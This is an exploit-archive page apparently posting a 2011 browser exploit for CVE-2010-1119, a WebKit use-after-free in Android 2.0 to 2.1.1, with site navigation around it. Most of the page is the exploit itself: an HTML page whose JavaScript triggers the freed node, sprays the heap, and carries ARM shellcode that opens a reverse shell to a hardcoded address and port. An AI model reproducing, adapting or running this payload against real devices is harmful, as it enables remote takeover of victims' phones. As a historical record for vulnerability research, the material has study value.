Android 2.0 / 2.1 / 2.1.1 WebKit Use-After-Free

Android 2.0 / 2.1 / 2.1.1 WebKit Use-After-Free: Posted Mar 14, 2011; Authored by MJ Keith; Android versions 2.0, 2.1, and 2.1.1 WebKit use-after-free exploit.; tags | exploit; advisories | CVE-2010-1119; SHA-256 | ab58ac8cc9c0e22587cba2b5f2c0de161b1d1d1f508a000c21040aed212e232b; Download | Favorite | View

Android 2.0 / 2.1 / 2.1.1 WebKit Use-After-Free

<html>
<!--
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119
 
This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
-->
 
<head>
<script language="JavaScript">
function heap()
{
 
var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };
 
 
var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate
 
 do
 {
  scode += scode;
  scode2 += scode2;
 
 } while (scode.length<=0x1000);
  
scode2 += shell
  
 
        target = new Array();
        for(i = 0; i < 300; i++){
           
            if (i<130){ target[i] = scode;}
            if (i>130){ target[i] = scode2;}
 
                  document.write(target[i]);
                  document.write("<br />");
                if (i>250){
                       //  alert("freeze");
                         nodes[0].textContent}
 
}
 
 }, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>

Top Authors In Last 30 Days

Red Hat 294 files
Ubuntu 63 files
Debian 34 files
Gentoo 32 files
LiquidWorm 10 files
malvuln 7 files
nu11secur1ty 7 files
Ahmet Umit Bayram 4 files
Adam Gowdiak 4 files
gabe_k 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,038)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,583)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,746)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,492)
UNIX (9,397)
UnixWare (187)
Windows (6,657)
Other

Android 2.0 / 2.1 / 2.1.1 WebKit Use-After-Free

Android 2.0 / 2.1 / 2.1.1 WebKit Use-After-Free

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Android 2.0 / 2.1 / 2.1.1 WebKit Use-After-Free

Share This

Android 2.0 / 2.1 / 2.1.1 WebKit Use-After-Free

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems